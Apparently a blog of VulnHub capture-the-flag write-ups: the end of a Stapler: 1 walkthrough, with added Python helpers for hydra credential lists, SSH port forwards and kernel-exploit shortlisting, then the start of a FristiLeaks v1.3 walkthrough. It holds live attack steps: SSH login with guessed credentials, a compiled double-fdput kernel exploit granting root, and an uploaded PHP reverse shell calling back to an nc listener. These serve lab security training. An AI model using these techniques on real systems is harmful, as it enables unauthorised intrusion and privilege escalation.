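The question above (can the same credentials get an interactive shell?) is really a question about which accounts in this file can log in at all, and which username:password guesses are worth trying. The script below is an added example for this write-up, not something from the original post: it parses a passwd(5) dump, keeps the accounts with a usable login shell, and emits login:password pairs in the colon-separated format that hydra reads with `-C`, using the username-as-password guess that worked for SHayslett. The passwd excerpt inside it is a constructed sample copied from a few lines of the dump above, and the hydra invocation in the trailing comment is an assumed usage, not a command from the post.

```python
"""Which accounts from a leaked /etc/passwd can actually log in, and
which login:password guesses to feed hydra. Added example for this
write-up, not the author's script."""
from typing import List

# Constructed sample: a few lines lifted from the passwd dump above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
www:x:1028:1028::/home/www:
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash
"""

# Shells that refuse an interactive login. An EMPTY shell field is not one of
# them: passwd(5) says login falls back to /bin/sh, so 'www' above is a live
# account even though a naive `grep -v nologin | grep -v false` would keep or
# drop it by accident.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_passwd(text: str) -> List[dict]:
    """Parse passwd(5) lines; skip blank or malformed ones."""
    users = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home,
                      "shell": shell or "/bin/sh"})
    return users


def interactive_users(text: str, include_root: bool = False) -> List[str]:
    """Accounts with a usable shell in the human UID range (>= 1000), plus
    root on request. System accounts (1..999) are skipped: they rarely have
    a password set at all."""
    names = []
    for u in parse_passwd(text):
        if u["shell"] in NON_LOGIN_SHELLS:
            continue
        if u["uid"] == 0:
            if include_root:
                names.append(u["name"])
            continue
        if u["uid"] < 1000:
            continue
        names.append(u["name"])
    return names


def hydra_combo_lines(text: str) -> List[str]:
    """login:password pairs for `hydra -C <file>`: username as password, plus
    the all-lowercase variant for mixed-case names such as SHayslett."""
    lines = []
    for name in interactive_users(text):
        lines.append(f"{name}:{name}")
        if name != name.lower():
            lines.append(f"{name}:{name.lower()}")
    return lines


if __name__ == "__main__":
    # Assumed usage on the attacker box (not a command from the post):
    #   python3 combos.py > combos.txt
    #   hydra -C combos.txt ssh://192.168.117.136
    print("\n".join(hydra_combo_lines(SAMPLE_PASSWD)))
```

The UID cut-off and the empty-shell rule are the two places a hand-rolled wordlist usually goes wrong: service accounts inflate the list and burn lockout budget, while an account with an empty shell field is silently dropped by most one-liners even though it logs in fine.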
GAINING A LOW-PRIVILEGE SHELL USING THE OBTAINED CREDENTIALS (THROUGH SMB ENUMERATION)
While I put the banner here, if you have been reading up to this point you will know that the steps on this path were as follows:

* Performed SMB enumeration
* Obtained a list of users and used it to build a wordlist for brute-force attacks
* Used hydra to brute-force the FTP service, gained authenticated access and was able to download files, e.g. passwd

What if I target the SSH service instead of FTP in step 3? Can I gain a low-privilege shell on the target machine using the following credentials?

> username: SHayslett
> password: SHayslett

Apparently, the answer is YES:

> $ ssh SHayslett@192.168.117.136
> -----------------------------------------------------------------
> ~          Barry, don't forget to put a message here          ~
> -----------------------------------------------------------------
> SHayslett@192.168.117.136's password:
> Welcome back!
>
> SHayslett@red:~$ id
> uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)

Wait: while it is not strictly necessary, I have not looked at ports 3306 and 12380 yet. Will there be other ways to gain a foothold on the system apart from the method above? Maybe. But that is for next time, provided I can find other ways in (and have the time for it).

> Update on 30 April 2018: I just posted a new write-up on a different path to gain entry into the machine, using a method other than the SMB enumeration I used in this write-up. If you're interested, make your way to Write-up for Stapler: 1 – A Different Path.
PRIVILEGE ESCALATION – LOCAL ENUMERATION

Once again, it's time to throw in our favourite enumeration scripts and look for privilege escalation possibilities. Since we have SSH access, we can simply use SCP to transfer files, or any other method you prefer (FTP, HTTP, etc.). Here is the interesting information I shortlisted. First, the kernel information; this is extremely important when looking for privilege escalation paths:

> Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
>
> DISTRIB_ID=Ubuntu
> DISTRIB_RELEASE=16.04
> DISTRIB_CODENAME=xenial
> DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"

Also, /home/www is world-writable (drwxrwxrwx), unlike every other home directory:

> # permissions on /home directories:
> total 128K
> drwxr-xr-x 32 root       root       4.0K Jun  4  2016 .
> drwxr-xr-x 22 root       root       4.0K Jun  7  2016 ..
> drwxr-xr-x  2 AParnell   AParnell   4.0K Jun  5  2016 AParnell
> drwxr-xr-x  2 CCeaser    CCeaser    4.0K Jun  5  2016 CCeaser
> drwxr-xr-x  2 CJoo       CJoo       4.0K Jun  5  2016 CJoo
> drwxr-xr-x  2 Drew       Drew       4.0K Jun  5  2016 Drew
> drwxr-xr-x  2 DSwanger   DSwanger   4.0K Jun  5  2016 DSwanger
> drwxr-xr-x  2 Eeth       Eeth       4.0K Jun  5  2016 Eeth
> drwxr-xr-x  2 elly       elly       4.0K Jun  5  2016 elly
> drwxr-xr-x  2 ETollefson ETollefson 4.0K Jun  5  2016 ETollefson
> drwxr-xr-x  2 IChadwick  IChadwick  4.0K Jun  5  2016 IChadwick
> drwxr-xr-x  2 jamie      jamie      4.0K Jun  5  2016 jamie
> drwxr-xr-x  2 JBare      JBare      4.0K Jun  5  2016 JBare
> drwxr-xr-x  2 jess       jess       4.0K Jun  5  2016 jess
> drwxr-xr-x  2 JKanode    JKanode    4.0K Jun  5  2016 JKanode
> drwxr-xr-x  2 JLipps     JLipps     4.0K Jun  5  2016 JLipps
> drwxr-xr-x  2 kai        kai        4.0K Jun  5  2016 kai
> drwxr-xr-x  2 LSolum     LSolum     4.0K Jun  5  2016 LSolum
> drwxr-xr-x  2 LSolum2    LSolum2    4.0K Jun  5  2016 LSolum2
> drwxr-xr-x  2 MBassin    MBassin    4.0K Jun  5  2016 MBassin
> drwxr-xr-x  2 mel        mel        4.0K Jun  5  2016 mel
> drwxr-xr-x  2 MFrei      MFrei      4.0K Jun  5  2016 MFrei
> drwxr-xr-x  2 NATHAN     NATHAN     4.0K Jun  5  2016 NATHAN
> drwxr-xr-x  3 peter      peter      4.0K Jun  3  2016 peter
> drwxr-xr-x  2 RNunemaker RNunemaker 4.0K Jun  5  2016 RNunemaker
> drwxr-xr-x  2 Sam        Sam        4.0K Jun  5  2016 Sam
> drwxr-xr-x  2 SHAY       SHAY       4.0K Jun  5  2016 SHAY
> drwxr-xr-x  3 SHayslett  SHayslett  4.0K Dec 17 19:12 SHayslett
> drwxr-xr-x  2 SStroud    SStroud    4.0K Jun  5  2016 SStroud
> drwxr-xr-x  2 Taylor     Taylor     4.0K Jun  5  2016 Taylor
> drwxrwxrwx  2 www        www        4.0K Jun  5  2016 www
> drwxr-xr-x  2 zoe        zoe        4.0K Jun  5  2016 zoe

Netstat information. Interestingly, there is an SMTP server bound to localhost only (127.0.0.1:25), probably something put there specifically as a privilege escalation path:

> Active Internet connections (servers and established)
> Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
> tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
> tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -
> tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
> tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -
> tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN      -
> tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
> tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      -
> tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
> tcp        0      0 0.0.0.0:666             0.0.0.0:*               LISTEN      -
> tcp        0      0 0.0.0.0:12380           0.0.0.0:*               LISTEN      -
> tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -
> tcp        0      0 192.168.117.136:22      192.168.117.134:53878   ESTABLISHED -
> tcp6       0      0 :::139                  :::*                    LISTEN      -
> tcp6       0      0 :::53                   :::*                    LISTEN      -
> tcp6       0      0 :::22                   :::*                    LISTEN      -
> tcp6       0      0 :::445                  :::*                    LISTEN      -

I didn't know there was anything listening on port 8888 though. I tried connecting to it from outside and it doesn't work; even nmap reports the port as filtered:

> $ nmap -sS -Pn -T4 -p8888 192.168.117.136
> Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-17 19:22 +08
> Nmap scan report for 192.168.117.136
> Host is up (0.00031s latency).
> PORT     STATE    SERVICE
> 8888/tcp filtered sun-answerbook

After checking the locally running processes, I finally understood what the issue was:

> root      1430  0.0  0.3   6472  3220 ?        S    15:27   0:00 su -c cd /home/JKanode; python2 -m SimpleHTTPServer 8888 &>/dev/null JKanode

So there is indeed an HTTP server: a Python SimpleHTTPServer serving /home/JKanode on port 8888, started as user JKanode via su. Note that the `&>/dev/null` only throws away the server's own log output; clients that reach it still get their responses. What keeps the port unreachable from outside is most likely a host firewall (nmap reports it as filtered, and there is a ufw directory in /etc), so it can only be reached from the box itself, for example through an SSH port forward.

Other findings from the local enumeration, on software versions:

> Sudo version:
> Sudo version 1.8.16
>
> MySQL version:
> mysql  Ver 14.14 Distrib 5.7.12, for Linux (i686) using  EditLine wrapper
>
> Apache version:
> Server version: Apache/2.4.18 (Ubuntu)
> Server built:   2016-04-15T18:00:57

The author has been very nice to leave all these tools on the box:

> /bin/nc
> /bin/netcat
> /usr/bin/wget
> /usr/bin/gcc
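The netstat output above is most useful when it is compared against what the attacker could actually reach: 127.0.0.1:25 is bound to loopback, and 8888 is bound to all interfaces yet shows as filtered from outside. The script below is an added example for this write-up, not the author's script: it parses a netstat listing, sorts each listener into reachable, loopback-only or filtered, and prints the `ssh -L` forwards that expose the unreachable ones on the attacker's machine through the SSH session we already have. The netstat text inside it is a constructed sample based on the output above; the set of externally open ports is an assumption standing in for the earlier full-port nmap scan, which is not reproduced in this part of the write-up.

```python
"""Which listeners on the box can the attacker not reach, and how to get to
them over the SSH session we already have. Added example for this write-up,
not the author's script."""
import re
from typing import Dict, List, Set, Tuple

# Constructed sample, based on the netstat output above.
NETSTAT_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:666             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:12380           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -
tcp        0      0 192.168.117.136:22      192.168.117.134:53878   ESTABLISHED -
tcp6       0      0 :::139                  :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
"""

# Assumption: the ports the external full-port nmap scan reported as open
# (that scan is not reproduced in this part of the write-up).
EXTERNALLY_OPEN = {21, 22, 53, 80, 139, 445, 666, 3306, 12380}

LISTEN_RE = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN")
LOOPBACK = {"127.0.0.1", "::1"}


def parse_listeners(netstat_text: str) -> List[Tuple[str, int]]:
    """(bind address, port) for every TCP LISTEN socket; '::' means all IPv6 interfaces."""
    found = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            found.append((m.group(2), int(m.group(3))))
    return found


def classify(netstat_text: str, external_open: Set[int]) -> Dict[str, List[int]]:
    """Split listening ports into three buckets:
    reachable     - open from the attacker's side
    loopback_only - bound to 127.0.0.1/::1, never visible externally
    filtered      - bound to all interfaces but not reachable, i.e. blocked
                    on the way in (a host firewall such as ufw on this box)"""
    buckets: Dict[str, List[int]] = {"reachable": [], "loopback_only": [], "filtered": []}
    seen: Set[int] = set()
    for addr, port in parse_listeners(netstat_text):
        if port in seen:          # tcp and tcp6 rows for the same service
            continue
        seen.add(port)
        if port in external_open:
            buckets["reachable"].append(port)
        elif addr in LOOPBACK:
            buckets["loopback_only"].append(port)
        else:
            buckets["filtered"].append(port)
    for ports in buckets.values():
        ports.sort()
    return buckets


def forward_commands(netstat_text: str, external_open: Set[int],
                     user: str, host: str) -> List[str]:
    """One `ssh -L` per unreachable service. Privileged remote ports (< 1024)
    are mapped to 10000+port locally so the forward works without root on
    the attacker's machine."""
    b = classify(netstat_text, external_open)
    cmds = []
    for port in b["loopback_only"] + b["filtered"]:
        local = port if port >= 1024 else 10000 + port
        cmds.append(f"ssh -L {local}:127.0.0.1:{port} {user}@{host}")
    return cmds


if __name__ == "__main__":
    print(classify(NETSTAT_SAMPLE, EXTERNALLY_OPEN))
    print("\n".join(forward_commands(NETSTAT_SAMPLE, EXTERNALLY_OPEN,
                                     "SHayslett", "192.168.117.136")))
```

With the forward in place, the SimpleHTTPServer on 8888 and the SMTP daemon on 25 are both reachable from the attacker's own loopback, which is the simplest way to poke at them with the usual tooling instead of from a cramped shell on the target.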
That's it for now. Is there anything you noticed that can already help us get root?

PRIVILEGE ESCALATION USING A KERNEL EXPLOIT

One of the easier ways to escalate privileges is to run an existing kernel exploit. Sometimes it can be a pain to make it work, but if you understand the underlying issue and what the exploit is trying to do, you can usually get it working.

> $ searchsploit '4.4.0-21'
> ---------------------------------------------------------------------- ----------------------------------
>  Exploit Title                                                        |  Path (/usr/share/exploitdb/)
> ---------------------------------------------------------------------- ----------------------------------
> Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Ou | exploits/lin_x86-64/local/40049.c
> ---------------------------------------------------------------------- ----------------------------------

This is not going to work because our target runs a 32-bit kernel while the exploit is for 64-bit. What 32-bit, you ask? Here's a reminder:

> $ uname -a
> Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

Another way is to search for the Ubuntu version, 16.04:

> $ searchsploit '16.04'
> ---------------------------------------------------------------------- ----------------------------------
>  Exploit Title                                                        |  Path (/usr/share/exploitdb/)
> ---------------------------------------------------------------------- ----------------------------------
> Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution      | exploits/linux/local/40937.txt
> Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation         | exploits/linux/local/40054.c
> Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome | exploits/linux/local/40943.txt
> LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalati | exploits/linux/local/41923.txt
> Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fed | exploits/lin_x86-64/local/42275.c
> Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/ | exploits/lin_x86/local/42276.c
> Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt
> Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (M | exploits/linux/local/40759.rb
> Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Con | exploits/lin_x86-64/local/40871.c
> Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Ou | exploits/lin_x86-64/local/40049.c
> Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOA | exploits/linux/local/39772.txt
> Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Pri | exploits/linux/local/40489.txt
> censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting          | exploits/php/webapps/9129.txt
> ---------------------------------------------------------------------- ----------------------------------

After reading the descriptions of a few of these exploits, I selected the double-fdput exploit, ID 39772. The following is its description:
https://gist.github.com/kongwenbin/42f193df5c97b543356a253a3fc112a7

The URLs in that file pointing to the POC files all give 404 errors. However, something I learnt from my OSCP journey is to look for information online using a magical tool called a "SEARCH ENGINE", or as some call it, "Google". I managed to find the original exploit archive on chromium.
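Two things decided the choice above: the target is i686, so anything exploit-db files under lin_x86-64 is out, and the DoS entries are noise. The script below is an added example for this write-up, not the author's script and not the exploit: it parses the searchsploit table, drops candidates whose exploit-db path pins the wrong architecture (lin_x86-64 versus lin_x86; plain linux/ paths are not pinned), keeps only local privilege escalation entries, and then pre-flights the double-fdput candidate (EDB 39772, CVE-2016-4557) with the two cheap checks worth doing before compiling anything: the upstream kernel version, and the kernel.unprivileged_bpf_disabled sysctl, which makes the bpf() system call root-only and so kills this exploit outright. The searchsploit text inside it is a constructed subset of the table above. The fix version 4.5.5 is taken from the CVE description and is an assumption to verify against your distro's changelog; Ubuntu backports fixes without bumping the upstream version, so a "go" from this check is a hint, not a guarantee.

```python
"""Shortlist kernel exploits from searchsploit output for the target's
architecture, then pre-flight the BPF candidate before compiling anything.
Added example for this write-up, not the author's script and not the
exploit."""
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample: a subset of the searchsploit '16.04' table above.
SEARCHSPLOIT_SAMPLE = """\
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Con | exploits/lin_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Ou | exploits/lin_x86-64/local/40049.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOA | exploits/linux/local/39772.txt
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (M | exploits/linux/local/40759.rb
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/ | exploits/lin_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt
"""


class Candidate(NamedTuple):
    edb_id: int
    title: str
    path: str


def parse_searchsploit(text: str) -> List[Candidate]:
    """Split the 'Title | Path' table rows; the EDB id is the file's basename."""
    out = []
    for line in text.splitlines():
        if "|" not in line:
            continue
        title, path = (part.strip() for part in line.rsplit("|", 1))
        m = re.search(r"/(\d+)\.\w+$", path)
        if m:
            out.append(Candidate(int(m.group(1)), title, path))
    return out


def arch_ok(path: str, machine: str) -> bool:
    """exploit-db pins architecture in the path: lin_x86-64 vs lin_x86.
    `machine` is the `uname -m` value (i686 on this box). Plain 'linux/'
    paths are not pinned and pass through."""
    if "/lin_x86-64/" in path:
        return machine == "x86_64"
    if "/lin_x86/" in path:
        return machine in {"i386", "i486", "i586", "i686"}
    return True


def shortlist(text: str, machine: str, local_only: bool = True) -> List[int]:
    """EDB ids worth reading: right architecture and, by default, local
    privilege escalation rather than the DoS entries."""
    ids = []
    for c in parse_searchsploit(text):
        if not arch_ok(c.path, machine):
            continue
        if local_only and "/local/" not in c.path:
            continue
        ids.append(c.edb_id)
    return ids


def kernel_tuple(uname_r: str) -> Tuple[int, int, int]:
    """'4.4.0-21-generic' -> (4, 4, 0). The distro build number after the
    dash is deliberately ignored; see the caveat in bpf_doubleput_preflight."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", uname_r)
    if not m:
        raise ValueError(f"unparseable kernel release: {uname_r!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)))


def bpf_doubleput_preflight(uname_r: str,
                            unprivileged_bpf_disabled: Optional[int]) -> Tuple[bool, str]:
    """Cheap checks before bothering to compile EDB 39772 (CVE-2016-4557).
    unprivileged_bpf_disabled is the integer read from
    /proc/sys/kernel/unprivileged_bpf_disabled, or None if the file is absent.
    Assumption: the upstream fix landed in 4.5.5 (from the CVE text). A distro
    kernel can carry the fix at a lower version via backport, so a 'go' here
    is a hint, not a guarantee."""
    if kernel_tuple(uname_r) >= (4, 5, 5):
        return False, "upstream version already carries the fix"
    if unprivileged_bpf_disabled is None:
        return False, "sysctl missing: kernel predates unprivileged eBPF (4.4), bpf() needs CAP_SYS_ADMIN"
    if unprivileged_bpf_disabled != 0:
        return False, "kernel.unprivileged_bpf_disabled is set: bpf() is root-only, exploit cannot run"
    return True, "worth trying (the distro may still have backported the fix)"


if __name__ == "__main__":
    print(shortlist(SEARCHSPLOIT_SAMPLE, "i686"))
    print(bpf_doubleput_preflight("4.4.0-21-generic", 0))
```

On the target, `cat /proc/sys/kernel/unprivileged_bpf_disabled` gives the value to feed the pre-flight; a 0 on a 4.4.0-21 kernel is exactly the situation the rest of this section walks through.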
Now let's transfer it to the target machine using SCP. That's very convenient since I have SSH credentials:

> scp exploit.tar SHayslett@192.168.117.136:/tmp/
> -----------------------------------------------------------------
> ~          Barry, don't forget to put a message here          ~
> -----------------------------------------------------------------
> SHayslett@192.168.117.136's password:
> exploit.tar                                   100%   20KB   4.9MB/s   00:00

Now that the file is on the target machine, it is time to compile the exploit:

> SHayslett@red:/tmp$ tar xvf exploit.tar
> ebpf_mapfd_doubleput_exploit/
> ebpf_mapfd_doubleput_exploit/hello.c
> ebpf_mapfd_doubleput_exploit/suidhelper.c
> ebpf_mapfd_doubleput_exploit/compile.sh
> ebpf_mapfd_doubleput_exploit/doubleput.c
> SHayslett@red:/tmp$ cd ebpf_mapfd_doubleput_exploit/
> SHayslett@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh
> doubleput.c: In function 'make_setuid':
> doubleput.c:91:13: warning: cast from pointer to integer of different size
>      .insns = (__aligned_u64) insns,
>               ^
> doubleput.c:92:15: warning: cast from pointer to integer of different size
>      .license = (__aligned_u64)""
>                 ^

And it's done. There were a few warnings (casting a 32-bit pointer to a 64-bit integer, which is expected on an i686 build) but overall it looks good. Now, run the exploit:

> SHayslett@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
> starting writev
> woohoo, got pointer reuse
> writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
> suid file detected, launching rootshell...
> we have root privs now...
> root@red:/tmp/ebpf_mapfd_doubleput_exploit# id
> uid=0(root) gid=0(root) groups=0(root),1005(SHayslett)

There you go, I am now root. Lastly, the flag.txt:

> root@red:/root# cat flag.txt
> ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
>                           .-'''''-.
>                           |'-----'|
>                           |-.....-|
>                           |       |
>                           |       |
>            _,._           |       |
>     __.o`   o`"-.         |       |
>  .-O o `"-.o   O )_,._    |       |
> ( o   O   o )--.-"`O   o"-.`'-----'`
>  '--------'  (   o   O    o)
>               `----------`
> b6b545dc11b7a270f4bad23432190c75162c4a2b

-------------------------

If you like this post, please check out my other similar write-ups as well:

* Write-up for FristiLeaks v1.3
* Write-up for Kioptrix: 2014 (#5)
* Write-up for Kioptrix: Level 1.3 (#4)
* Write-up for Kioptrix: Level 1.2 (#3)
* Write-up for Kioptrix: Level 1.1 (#2)
* Write-up for Kioptrix: Level 1 (#1)
WRITE-UP FOR FRISTILEAKS V1.3
December 31, 2017, Wen Bin KONG
Categories: CTF, Resources. Tags: CTF, FristiLeaks, privilege escalation, Resources, tutorial, vm, vulnhub, writeup
To celebrate the end of 2017, I have decided to do a write-up on a VulnHub virtual machine (VM), like I did for the Kioptrix series.

It has proved to be an effective exercise: apart from improving my writing and explanation skills, I also get to refresh the technical skills and techniques I learnt while studying for my OSCP certification exam. Do read my OSCP/PWK course review if you intend to take the OSCP certification exam in 2018! Practice makes perfect.

As mentioned in my very first VulnHub write-up, the VMs on VulnHub are designed to be vulnerable, created specifically for security researchers and security enthusiasts to test against. It is a good way to test your technical skills, from identifying a vulnerability when you encounter one to crafting your own exploit or getting a publicly available Proof of Concept (POC) to work.

SETTING UP
In this write-up, we will be working on FristiLeaks v1.3. Before we get started, let's manually set the VM's MAC address to 08:00:27:A5:A6:76, as instructed by the author.

Instructions for VMware Workstation users to modify the MAC address:

* Import the OVA
* Click on Edit virtual machine settings
* Under the Hardware tab, click on Network Adapter
* On the right section of the window, click on Advanced
* In the pop-up window, enter the MAC address the VM creator specified

That's it, now you can launch the VM.

FristiLeaks v1.3

Please note that for the sake of writing this article I changed my VM's Network Adapter setting to NAT instead of the default Bridged, but that makes no difference for following along with the write-up.
HOST DISCOVERY
netdiscover -r 192.168.117.0/24

Looks like our target has been found to be hosted on 192.168.117.135. Do you find the MAC address familiar in some way?

192.168.117.135 08:00:27:a5:a6:76 1 60 PCS Systemtechnik GmbH

SERVICE DISCOVERY

nmap -sS -Pn -T4 -p- 192.168.117.135

Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 22:59 +08
Nmap scan report for 192.168.117.135
Host is up (0.00038s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

ENUMERATION – PORT 80

Interesting, there is only 1 open port. Let's scan port 80 specifically using scripts:

nmap -A -O -p80 192.168.117.135

Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 23:21 +08
Nmap scan report for 192.168.117.135
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

… buster.

dirb http://192.168.117.135

… password).

And there is this guy in the image that is going "Ha Ha" … Moving on, let's run the directory buster again.

dirb http://192.168.117.135/fristi/

… for now.
Since there is nothing else here, let's go back and view the page source of the login page. As my colleague Sven has always told me when we are working on a project: always view the page source, never trust the rendered output. It is very well said, as I have found several vulnerabilities in web applications that were messed up because some developers did not expect their users to either view the page source in their web browser (e.g. Firefox users can right-click, View Page Source) or view the HTTP responses directly in an HTTP proxy. Back to the write-up: indeed, the page source has several interesting things. For example, the meta description content is hilarious:

super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.

Also, the TODO comments are very interesting. There are two things that I can infer from reading this TODO list:

* "eezeepz" is the name of the developer who created this application.
* He is the type who writes notes within the application.

Assuming he uses "eezeepz" as his username, what could the password be? Going further down the page source, we can see that there is another chunk of base64-encoded content that was commented out. Well, what could it be? To decode the base64-encoded content, I used nano to make the content into a single line. It can be any other tool that you like; I need it to be a single line so I can conveniently run a command in my terminal to decode it.

base64 -d /tmp/encoded.txt

Wow. Apparently, it is a PNG image file, as you can see in the very first line of characters. It seems to link back to the meta description about "using base64 encoding for images". First, we save it as a PNG file.

base64 -d /tmp/encoded.txt > decoded.png

Next, we render it and see what is in the image. Again, you can use any tool to do this. For me, I like to use feh.

feh decoded.png
Interesting… for some reason, the only correlation I can think of for this set of characters is that it is probably someone's password… Let's try the following credentials on the login form:

username: eezeepz
password: keKkeKKeKKeKkEkkEk

Bingo!! Finally some progress! Looks like the only available function is the file upload feature. Now what? Let's conveniently upload a PHP reverse shell!

GAINING LOW PRIVILEGE ACCESS SHELL

Simply modify and use the one from Kali. If you are not using Kali, you can download the reverse shell source code here, created by pentestmonkey.

cp /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php
vi reverse-shell.php

Make the necessary changes to insert your own local IP address and listening port. Now set up a netcat listener to catch the connection.

nc -nlvp 8888
Bad news! Only png, jpg, gif are allowed. Looks like things are not so easy after all. There are many ways to configure a file upload function, and developers should consider many different things. For instance, to prevent directory traversal, they should use basename() or rename the file completely (e.g. using microtime() and some random numbers). Also, check the file type and size if there is any limit to be enforced. The question now is, did the developer of this application implement the file upload functionality correctly? Or is it only validating the file extension? What if I just add the .jpg extension to the PHP file, will it bypass the validation filters?

cp reverse-shell.php reverse-shell.php.jpg

Since this is a VulnHub VM, there is no harm in trying things out! We all learn.

Surprisingly (or maybe as expected), IT WORKS!! As hinted by the output, now is the time to go back to the "dead end" that we identified previously and walk the newly discovered path. Render the following URL in your web browser:

* http://192.168.117.135/fristi/uploads/reverse-shell.php.jpg

After rendering the page, a reverse shell has been established to your local machine!

root@kali:/tmp# nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.117.134] from (UNKNOWN) [192.168.117.135] 41116
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
20:59:09 up 3:45, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$
